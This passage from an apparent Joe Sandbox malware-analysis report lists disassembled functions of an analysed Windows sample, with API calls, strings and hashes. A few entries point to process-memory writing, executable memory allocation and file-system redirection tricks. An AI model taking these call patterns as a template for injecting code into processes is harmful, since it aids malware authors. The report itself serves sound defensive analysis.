                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                          • String ID: @
                                          • API String ID: 4150878124-2766056989
                                          • Opcode ID: 81aed6f52e886593873c3189e29499745307a8959d685537400348ab879460c6
                                          • Instruction ID: 05b2407c34f6298608a1f3e27b756934046db131e4ae0f030e4b32fef562407b
                                          • Opcode Fuzzy Hash: 81aed6f52e886593873c3189e29499745307a8959d685537400348ab879460c6
                                          • Instruction Fuzzy Hash: 9F41417690021CBFDB10DFA5CC51BDEBBB8EB45300F144159FA45B7151DA716E89CBA0
                                          Function 00987946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0098F910,00000000,?,?,?,?), ref: 009879DF
                                          • GetWindowLongW.USER32 ref: 009879FC
                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00987A0C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Window$Long
                                          • String ID: SysTreeView32
                                          • API String ID: 847901565-1698111956
                                          • Opcode ID: 7964d577688ac5fa6e4161811687740410486c37cb60cfee69f2fa08dc3df8cb
                                          • Instruction ID: 845557ef4a6656d69b3c0c7ccd61bf78d973d07710c4938c7ce21ca608180421
                                          • Opcode Fuzzy Hash: 7964d577688ac5fa6e4161811687740410486c37cb60cfee69f2fa08dc3df8cb
                                          • Instruction Fuzzy Hash: 4C31DE31204206AFDB15AF78CC45BEAB7A9EB49324F204725F875A22E0D731E9919B50
                                          Function 009873D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00987461
                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00987475
                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00987499
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window
                                          • String ID: SysMonthCal32
                                          • API String ID: 2326795674-1439706946
                                          • Opcode ID: 9ff1b52418c01271cade3f522bf2588fcb1aabb22fcde47883c4797912423719
                                          • Instruction ID: 368f4a87cdd937dd73c8617fe3c9c3c79f8074484d182bd421d229f6ed85e7fd
                                          • Opcode Fuzzy Hash: 9ff1b52418c01271cade3f522bf2588fcb1aabb22fcde47883c4797912423719
                                          • Instruction Fuzzy Hash: D4219432514218ABDF11DFA4CC46FEA7B6AEB48724F110114FE156B2E0D675EC919B90
                                          Function 00987B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00987C4A
                                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00987C58
                                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00987C5F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessageSend$DestroyWindow
                                          • String ID: msctls_updown32
                                          • API String ID: 4014797782-2298589950
                                          • Opcode ID: c7e0c7d8024a8a51b1b419265ee64be2f9b7ee576438f3e8e747a7611c1dd44c
                                          • Instruction ID: 6d366db64b043850b612ed6a44c7474f67061b1c2713036cf49521b0a7553f59
                                          • Opcode Fuzzy Hash: c7e0c7d8024a8a51b1b419265ee64be2f9b7ee576438f3e8e747a7611c1dd44c
                                          • Instruction Fuzzy Hash: 77218EB5604208AFDB10EF64DCC1DA777EDEF59354B240059FA019B3A1CB31EC419B60
                                          Function 00986CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00986D3B
                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00986D4B
                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00986D70
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessageSend$MoveWindow
                                          • String ID: Listbox
                                          • API String ID: 3315199576-2633736733
                                          • Opcode ID: 1b718eb6cf45539944f9a698b1045e478b27b70745eff970aac0250f13c9bf84
                                          • Instruction ID: 3ef9270af2df3065f243032678f89ea0c3ab8fb7a0ad18b0b14a83d7b84a83e1
                                          • Opcode Fuzzy Hash: 1b718eb6cf45539944f9a698b1045e478b27b70745eff970aac0250f13c9bf84
                                          • Instruction Fuzzy Hash: C5219232610118BFDF129F54DC45FAB3BBEEF89764F118124FA459B2A0C671AC5197A0
                                          Function 0098770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00987772
                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00987787
                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00987794
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: msctls_trackbar32
                                          • API String ID: 3850602802-1010561917
                                          • Opcode ID: ba8e9fbe2b4025f1b8c32842314254b89b873885140cc920bc4e979fa8b2429d
                                          • Instruction ID: dc49755202056b7c644e88677678824f8a1c1f3576d13ed3244b46aedf1c6b19
                                          • Opcode Fuzzy Hash: ba8e9fbe2b4025f1b8c32842314254b89b873885140cc920bc4e979fa8b2429d
                                          • Instruction Fuzzy Hash: 91112732214208BEEF106FA0CC01FEBB76CEF88B54F110118F641921D0C271E851DB20
                                          Function 00904C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00904BD0,?,00904DEF,?,009C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00904C11
                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00904C23
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                          • API String ID: 2574300362-3689287502
                                          • Opcode ID: c734f3b9bdd0acb7380d2fb7d51b170160ec5b9c05eb1f3bf28f819ebadb8dbf
                                          • Instruction ID: 247d4ac755b6d07a5fa10ba913883e823e8eef19e8cd2f8cc08831e706c62087
                                          • Opcode Fuzzy Hash: c734f3b9bdd0acb7380d2fb7d51b170160ec5b9c05eb1f3bf28f819ebadb8dbf
                                          • Instruction Fuzzy Hash: E1D01270515723CFD7206F71DA1864AB6D9EF09756B119C3994C5D6290E6B0D480C750
                                          Function 00904C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00904B83,?), ref: 00904C44
                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00904C56
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                          • API String ID: 2574300362-1355242751
                                          • Opcode ID: c58e192103e10f14e6844f7d843ffd2b204d95b5aaac2475b23313ae86157652
                                          • Instruction ID: adf65b6dc21c8c6d2e20f094dfce97826cb2b7ec2c33bb58cfc061a7e623031b
                                          • Opcode Fuzzy Hash: c58e192103e10f14e6844f7d843ffd2b204d95b5aaac2475b23313ae86157652
                                          • Instruction Fuzzy Hash: FCD01770628723CFE7209F31D91868A76E8AF05765B11983EA5D6D62A4E6B0D8C0CB60
                                          Function 00980DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,00981039), ref: 00980DF5
                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00980E07
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                          • API String ID: 2574300362-4033151799
                                          • Opcode ID: f9e576d6edf9d2c516c9dde08a966ab8befe60fdf7e204323f213a831b0d31ab
                                          • Instruction ID: 4511f36cce9b5670505b1967353e7f9347179f9153373c66424700a112439004
                                          • Opcode Fuzzy Hash: f9e576d6edf9d2c516c9dde08a966ab8befe60fdf7e204323f213a831b0d31ab
                                          • Instruction Fuzzy Hash: 26D0C730564322CFC320AF70C8086C372E8AF84362F008C3EA982C2250E6B0D890CB00
                                          Function 009790E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00978CF4,?,0098F910), ref: 009790EE
                                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00979100
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetModuleHandleExW$kernel32.dll
                                          • API String ID: 2574300362-199464113
                                          • Opcode ID: fc6da62836c45fbc6694b232e46d6b17353c848295234359966b19a9b11aaa72
                                          • Instruction ID: dc3ae96c6ff47a8bf951d46a1c0bb033c95f83a6a49d5a01278374f97f5d5468
                                          • Opcode Fuzzy Hash: fc6da62836c45fbc6694b232e46d6b17353c848295234359966b19a9b11aaa72
                                          • Instruction Fuzzy Hash: A9D0173562C713CFDB209F39D82C64676E8EF05765B52D83A948AD6690EA70C890CB90
                                          Function 00941714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: LocalTime__swprintf
                                          • String ID: %.3d$WIN_XPe
                                          • API String ID: 2070861257-2409531811
                                          • Opcode ID: 7c1971510797de0eec2879eb8e40def4e051e81b6a61ab6dc7162f656da6d904
                                          • Instruction ID: feeffefb7a64c53a4d36a2e767398d4289355eee5aa2709b80c4b89af9279248
                                          • Opcode Fuzzy Hash: 7c1971510797de0eec2879eb8e40def4e051e81b6a61ab6dc7162f656da6d904
                                          • Instruction Fuzzy Hash: 01D017B1858119FBCB109B909889CF973BCAB08311F200962F512A2080E22E9BD4EA25
                                          Function 0095717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cd8624c154f385ef04d88fbfb59d87add1ec2ee098373cd5ed0e609f2f9042ae
                                          • Instruction ID: b9c3f88f8408181a5be2d8ab20ad5078d7823f4695b67ad288924d734a586440
                                          • Opcode Fuzzy Hash: cd8624c154f385ef04d88fbfb59d87add1ec2ee098373cd5ed0e609f2f9042ae
                                          • Instruction Fuzzy Hash: 14C16D74A04216EFCB14CFA5D884AAEFBB9FF48711B148598EC05DB261D730DE85DB90
                                          Function 0097E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CharLowerBuffW.USER32(?,?), ref: 0097E0BE
                                          • CharLowerBuffW.USER32(?,?), ref: 0097E101
                                            • Part of subcall function 0097D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0097D7C5
                                          • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0097E301
                                          • _memmove.LIBCMT ref: 0097E314
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: BuffCharLower$AllocVirtual_memmove
                                          • String ID:
                                          • API String ID: 3659485706-0
                                          • Opcode ID: 16feb12a887425d2e4b9266ee0ec83afe1c6e125c510f8c056102a5bfc98befc
                                          • Instruction ID: 0d03cd0b2d7e54b7d33c6f5bac155e53e7e3412057d4682bfd396ae63ec5f548
                                          • Opcode Fuzzy Hash: 16feb12a887425d2e4b9266ee0ec83afe1c6e125c510f8c056102a5bfc98befc
                                          • Instruction Fuzzy Hash: 5CC12972608311DFC714DF28C481A6ABBE4FF89714F14896EF8999B352D731E945CB81
                                          Function 00978093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                          Download Yara Rule
                                          APIs
                                          • CoInitialize.OLE32(00000000), ref: 009780C3
                                          • CoUninitialize.OLE32 ref: 009780CE
                                            • Part of subcall function 0095D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0095D5D4
                                          • VariantInit.OLEAUT32(?), ref: 009780D9
                                          • VariantClear.OLEAUT32(?), ref: 009783AA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                          • String ID:
                                          • API String ID: 780911581-0
                                          • Opcode ID: ccc4ace5d08950e22b6eb0a3aefb0b0c655ee4dac0cb23f42b93f052a52f653c
                                          • Instruction ID: 6399781c05faeb710913fd291336bf98174b48becd3be6d9a6767eb05015e90d
                                          • Opcode Fuzzy Hash: ccc4ace5d08950e22b6eb0a3aefb0b0c655ee4dac0cb23f42b93f052a52f653c
                                          • Instruction Fuzzy Hash: 46A15A766047019FCB10DF64C485B2AB7E4BF89764F148859F99A9B3A2CB34ED05CB82
                                          Function 00957530 Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                          Download Yara Rule
                                          APIs
                                          • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00992C7C,?), ref: 009576EA
                                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00992C7C,?), ref: 00957702
                                          • CLSIDFromProgID.OLE32(?,?,00000000,0098FB80,000000FF,?,00000000,00000800,00000000,?,00992C7C,?), ref: 00957727
                                          • _memcmp.LIBCMT ref: 00957748
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: FromProg$FreeTask_memcmp
                                          • String ID:
                                          • API String ID: 314563124-0
                                          • Opcode ID: 3c6d4a12126ab455fb3328e1f0f60dcc0ebdd91009181a998fced04d7604b5bd
                                          • Instruction ID: 37a53d877fba94fac9a55507139c9c7911e26a81e12be0fae18fa44b70ec9020
                                          • Opcode Fuzzy Hash: 3c6d4a12126ab455fb3328e1f0f60dcc0ebdd91009181a998fced04d7604b5bd
                                          • Instruction Fuzzy Hash: 5A810B75A00109EFCB04DFE5D984EEEB7B9FF89315F204558E506AB250DB71AE0ACB60
                                          Function 0095687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Variant$AllocClearCopyInitString
                                          • String ID:
                                          • API String ID: 2808897238-0
                                          • Opcode ID: e3f14eef5205a32fa34a9df8596759f91d67c97a2455a948c5c02d9f1d1093b9
                                          • Instruction ID: 8f09e45aae692d48d3ab0b83780d0545b3f3cd8aa13e66c40e7187775b4d6616
                                          • Opcode Fuzzy Hash: e3f14eef5205a32fa34a9df8596759f91d67c97a2455a948c5c02d9f1d1093b9
                                          • Instruction Fuzzy Hash: 7351A1747043019EDF24EF66D891B2AB3E9AF85311F60D81FE996DB292DA34D8488701
                                          Function 009897F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetWindowRect.USER32(0102EC70,?), ref: 00989863
                                          • ScreenToClient.USER32(00000002,00000002), ref: 00989896
                                          • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00989903
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Window$ClientMoveRectScreen
                                          • String ID:
                                          • API String ID: 3880355969-0
                                          • Opcode ID: b75c779bef43d6a8e363291fd4f420223f3d28751fd73dfcb5ea02c92e868087
                                          • Instruction ID: 624a6c3f57e29653ffb7b8d11c05ac9df8cf432205b046b39610bdee109d1264
                                          • Opcode Fuzzy Hash: b75c779bef43d6a8e363291fd4f420223f3d28751fd73dfcb5ea02c92e868087
                                          • Instruction Fuzzy Hash: 83510D75A00209AFCF14DF64C884ABE7BB9FF55360F188259F8659B3A0D731AD81DB90
                                          Function 00959A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00959AD2
                                          • __itow.LIBCMT ref: 00959B03
                                            • Part of subcall function 00959D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00959DBE
                                          • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00959B6C
                                          • __itow.LIBCMT ref: 00959BC3
                                          Memory Dump Source
